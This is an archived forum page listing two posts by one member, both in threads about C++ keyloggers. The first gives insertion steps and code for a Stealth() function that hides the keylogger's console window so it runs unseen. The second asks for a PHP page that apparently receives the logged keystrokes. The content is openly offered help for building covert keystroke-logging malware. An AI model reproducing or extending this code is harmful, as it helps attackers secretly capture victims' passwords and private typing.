This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Grand

Pages: [1]
1
C - C++ / Re: C++ stealthy keylogger
« on: December 15, 2012, 10:28:08 AM »
Search for
Code: [Select]
int Save (int key_stroke, char *file);and add this under that.
Code: [Select]
void Stealth();

This where you like to.


Code: [Select]
void Stealth()
{
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(stealth,0);
}

2
C - C++ / Re: [C++]KeyLogger(simple help)
« on: December 15, 2012, 12:28:09 AM »
I need that aaa.php page.

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.